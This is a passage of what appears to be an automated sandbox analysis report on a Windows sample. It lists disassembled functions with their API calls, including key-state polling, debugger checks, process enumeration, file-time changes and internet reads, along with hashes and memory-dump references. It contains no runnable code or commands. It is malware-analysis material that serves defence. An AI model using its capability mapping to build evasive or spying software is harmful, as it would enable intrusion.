                                                                                                                • Instruction Fuzzy Hash: B6412C7164030067E720BB3A8C83F5A72D89F40728F144D5EF954BB2C3D6BAAD45475D
                                                                                                                Function 00456354 Relevance: 7.6, APIs: 5, Instructions: 127keyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                                                • ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                                                • GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                                                • GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456430
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3539004672-0
                                                                                                                • Opcode ID: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                                                                • Instruction ID: 0eacbf52c9ff4b21db6d2500407d28a57be55752a0539e191fb639d8ee6a043b
                                                                                                                • Opcode Fuzzy Hash: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                                                                • Instruction Fuzzy Hash: 8E416071108341ABD724DF55CD84EBBB7E9EF86725F540B0EB8A543281C734A848CB6A
                                                                                                                Function 004772DE Relevance: 7.6, APIs: 5, Instructions: 67windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                • IsWindowVisible.USER32 ref: 00477314
                                                                                                                • IsWindowEnabled.USER32 ref: 00477324
                                                                                                                • GetForegroundWindow.USER32(?,?,?,00000001,?,?), ref: 00477331
                                                                                                                • IsIconic.USER32 ref: 0047733F
                                                                                                                • IsZoomed.USER32 ref: 0047734D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                • String ID:
                                                                                                                • API String ID: 292994002-0
                                                                                                                • Opcode ID: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                                                                • Instruction ID: c753cb395bd8887e5e04db90522a3107d7308fd2cfa588f53a4db7a4177bc043
                                                                                                                • Opcode Fuzzy Hash: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                                                                • Instruction Fuzzy Hash: 351172327041119BE3209B26DD05B9FB7A8AF91310F05882EFC49E7250D7B8EC42D7A9
                                                                                                                Function 00417D93 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,00000314), ref: 00417E6F
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000314), ref: 00417E79
                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000314), ref: 00417E86
                                                                                                                • GetCurrentProcess.KERNEL32(C0000417,?,?,00000314), ref: 00417EA1
                                                                                                                • TerminateProcess.KERNEL32(00000000,?,?,00000314), ref: 00417EA8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 2579439406-0
                                                                                                                • Opcode ID: 1e849d302d6523c4eca3589611bb7f1730917824b3e599ff67baae63fbfc1711
                                                                                                                • Instruction ID: 1e353620185c301eaa467651b296c472c2ab582025bec62c778f005c55eb3537
                                                                                                                • Opcode Fuzzy Hash: 1e849d302d6523c4eca3589611bb7f1730917824b3e599ff67baae63fbfc1711
                                                                                                                • Instruction Fuzzy Hash: 0A31D4B09013289BCB60DF65DD897C9BBB8AF18304F5045EEE50CA6251DBB85FC48F08
                                                                                                                Function 004223BC Relevance: 7.6, APIs: 5, Instructions: 53timethreadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 004223F3
                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 004223FF
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00422407
                                                                                                                • GetTickCount.KERNEL32 ref: 0042240F
                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 0042241B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                • String ID:
                                                                                                                • API String ID: 1445889803-0
                                                                                                                • Opcode ID: f5f58df8b3066ca0205ef19db65b763b05621757b61e1ba64a9c786d5d6483bf
                                                                                                                • Instruction ID: fccd6c2f0e9de14ca193dd89c54efe282b2f985546ae9d4e91778ab0a4262a43
                                                                                                                • Opcode Fuzzy Hash: f5f58df8b3066ca0205ef19db65b763b05621757b61e1ba64a9c786d5d6483bf
                                                                                                                • Instruction Fuzzy Hash: 94115672E00124ABCB209BB4EE4855FB7F4FF58351F920976DD01E7210DAB49D00C798
                                                                                                                Function 00436D2D Relevance: 7.6, APIs: 5, Instructions: 52filetimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,77023220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                                                                                • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00436D93
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseCreateHandleTime
                                                                                                                • String ID:
                                                                                                                • API String ID: 3397143404-0
                                                                                                                • Opcode ID: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                                                • Instruction ID: bce1a9391340f9688fe0750810cd2cb1b104417d8b3c1e96578cdf6de8724fbd
                                                                                                                • Opcode Fuzzy Hash: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                                                • Instruction Fuzzy Hash: A4F0C83634132077E5301A69AC8DFCF276CABDAB32F20452EF741A61C083D51445977D
                                                                                                                Function 0042039F Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 282timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00417D93: IsDebuggerPresent.KERNEL32(?,?,00000314), ref: 00417E6F
                                                                                                                  • Part of subcall function 00417D93: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000314), ref: 00417E79
                                                                                                                  • Part of subcall function 00417D93: UnhandledExceptionFilter.KERNEL32(?,?,?,00000314), ref: 00417E86
                                                                                                                  • Part of subcall function 00417D93: GetCurrentProcess.KERNEL32(C0000417,?,?,00000314), ref: 00417EA1
                                                                                                                  • Part of subcall function 00417D93: TerminateProcess.KERNEL32(00000000,?,?,00000314), ref: 00417EA8
                                                                                                                • GetTimeZoneInformation.KERNEL32(00496C28), ref: 004204AA
                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,00496C2C,?,?,0000003F,?,?), ref: 00420528
                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,00496C80,000000FF,?,0000003F,?,?,?,00496C2C,?,?,0000003F,?,?), ref: 0042055C
                                                                                                                  • Part of subcall function 00413A88: RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                                                                                                  • Part of subcall function 00413A88: GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharExceptionFilterMultiProcessUnhandledWide$CurrentDebuggerErrorFreeHeapInformationLastPresentTerminateTimeZone
                                                                                                                • String ID: S\
                                                                                                                • API String ID: 4226027050-393906132
                                                                                                                • Opcode ID: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                                                                                                                • Instruction ID: b357f19af7064e56bcdb8625987f67de7edc2332d57e558cb2e7b84f91b73af7
                                                                                                                • Opcode Fuzzy Hash: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                                                                                                                • Instruction Fuzzy Hash: 6A91D371E00125AFDB20EF65EC819AE7BE9EF55300B95003BF540A7253DA3C89828F5C
                                                                                                                Function 0043701F Relevance: 6.1, APIs: 4, Instructions: 76processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
                                                                                                                • Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00437075
                                                                                                                • CloseHandle.KERNEL32(00000000,?), ref: 00437105
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                • String ID:
                                                                                                                • API String ID: 420147892-0
                                                                                                                • Opcode ID: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                                                                • Instruction ID: d866d71778569fbbd99b025f777f77cc3db9ba9c83dfb601fa45888e96c7797d
                                                                                                                • Opcode Fuzzy Hash: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                                                                • Instruction Fuzzy Hash: 9C21A7B20083819BD735DB55C881BEFB7E8BB99304F00491EF5C947241EB79A589CB6A
                                                                                                                Function 00446566 Relevance: 5.9, Strings: 4, Instructions: 868COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ERCP$VUUU$VUUU$VUUU
                                                                                                                • API String ID: 0-2165971703
                                                                                                                • Opcode ID: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                                                                • Instruction ID: 514654dd073cfe12bfc68f6c44a091d7a3824994b709b832431b3f3de6bbd106
                                                                                                                • Opcode Fuzzy Hash: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                                                                • Instruction Fuzzy Hash: 5562D3716087818BE734CF18C8807ABB7E1EBC6314F154A2FE49986390E779D949CB5B
                                                                                                                Function 0044ED9A Relevance: 5.4, Strings: 4, Instructions: 448COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: DEFINE$`$h$h
                                                                                                                • API String ID: 0-4194577831
                                                                                                                • Opcode ID: 924177e0c3576f85a96b78a37b3c3cedf46843da4e7c3acb3e3d7f55582469aa
                                                                                                                • Instruction ID: b1cbab3e2140d6a963e4b85c5b61650905c2e88cbb7a9c7ccaf19de07e543520
                                                                                                                • Opcode Fuzzy Hash: 924177e0c3576f85a96b78a37b3c3cedf46843da4e7c3acb3e3d7f55582469aa
                                                                                                                • Instruction Fuzzy Hash: 9802A1715083818FE725CF29C88076BBBE2BFD5304F28896EE89587342D779D849CB56
                                                                                                                Function 00436431 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
                                                                                                                • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: mouse_event
                                                                                                                • String ID: DOWN
                                                                                                                • API String ID: 2434400541-711622031
                                                                                                                • Opcode ID: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                                                                • Instruction ID: 8a73d33e481528181e274ae5662561dddcd8f7088196b39fde8242b6fe69d79f
                                                                                                                • Opcode Fuzzy Hash: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                                                                • Instruction Fuzzy Hash: 75E0927558872039FC4036253C02FFB174CAB66796F018116FE00D1291EA586D865BBD
                                                                                                                Function 0045C999 Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
                                                                                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                • String ID:
                                                                                                                • API String ID: 3541575487-0
                                                                                                                • Opcode ID: 14602e3ddb85434cb4a191148b4ac58dc13c9e22f939418703ff5d8e88b69fcb
                                                                                                                • Instruction ID: 18858b47483a38653cd59612877c1399ad483e9f26b014a4aa46912757e3bc7b
                                                                                                                • Opcode Fuzzy Hash: 14602e3ddb85434cb4a191148b4ac58dc13c9e22f939418703ff5d8e88b69fcb
                                                                                                                • Instruction Fuzzy Hash: EC41CE756003009FC720EF79D880A9BB3E4FF89315F208A6EED698B391D775A844CB95
                                                                                                                Function 00436ADE Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
                                                                                                                • FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00436B13
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFind$AttributesCloseFirst
                                                                                                                • String ID:
                                                                                                                • API String ID: 48322524-0
                                                                                                                • Opcode ID: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                                                                • Instruction ID: 417b6d6de692ea6945bae3bf725251b28653fd5bce93257cef0f58e2a105c1b1
                                                                                                                • Opcode Fuzzy Hash: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                                                                • Instruction Fuzzy Hash: 23E02236804418678600AB7CAC0C4EE779CDB0A335F100B96FE38C21D0D775A9408FEA
                                                                                                                Function 0044EBBC Relevance: 4.3, Strings: 3, Instructions: 551COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ACCEPT$^$h
                                                                                                                • API String ID: 0-4263704089
                                                                                                                • Opcode ID: adbbb77bd847cefbadd23aa8e42bde8f813033e7c46a43322acc698efb747d92
                                                                                                                • Instruction ID: 72a2cba82410d8b1d90f72ff5cad5771b474d57714a55a9933f2c727144888ce
                                                                                                                • Opcode Fuzzy Hash: adbbb77bd847cefbadd23aa8e42bde8f813033e7c46a43322acc698efb747d92
                                                                                                                • Instruction Fuzzy Hash: AE22A0746083818FE725CF29C48076BBBE2BFC9304F24896EE8D587351D779984ACB56
                                                                                                                Function 0044289D Relevance: 3.1, APIs: 2, Instructions: 82networkfileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InternetQueryDataAvailable.WININET(?,?,?,?,00000000,00000000), ref: 004428C2
                                                                                                                • InternetReadFile.WININET(?,00000000,?,?), ref: 004428F9
                                                                                                                  • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 901099227-0
                                                                                                                • Opcode ID: c5651eff999419169b46b76971b5abcb261cf656e183e849eb3ab7268b4b60d7
                                                                                                                • Instruction ID: 2c15810e60b1cb59304632cc8162977c32d0240baa2dcf3c2cd6ef22f942a6bb
                                                                                                                • Opcode Fuzzy Hash: c5651eff999419169b46b76971b5abcb261cf656e183e849eb3ab7268b4b60d7
                                                                                                                • Instruction Fuzzy Hash: 452174B12043016BF220EF56DD45FAFB3E8ABD4715F40492EF285A6180D7B8E949C76A
                                                                                                                Function 004230F5 Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004231F1
                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 004231FE
                                                                                                                  • Part of subcall function 004180A7: GetModuleFileNameA.KERNEL32(00000000,00496789,00000104,?,00411739,?,00401C0B), ref: 0041814A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
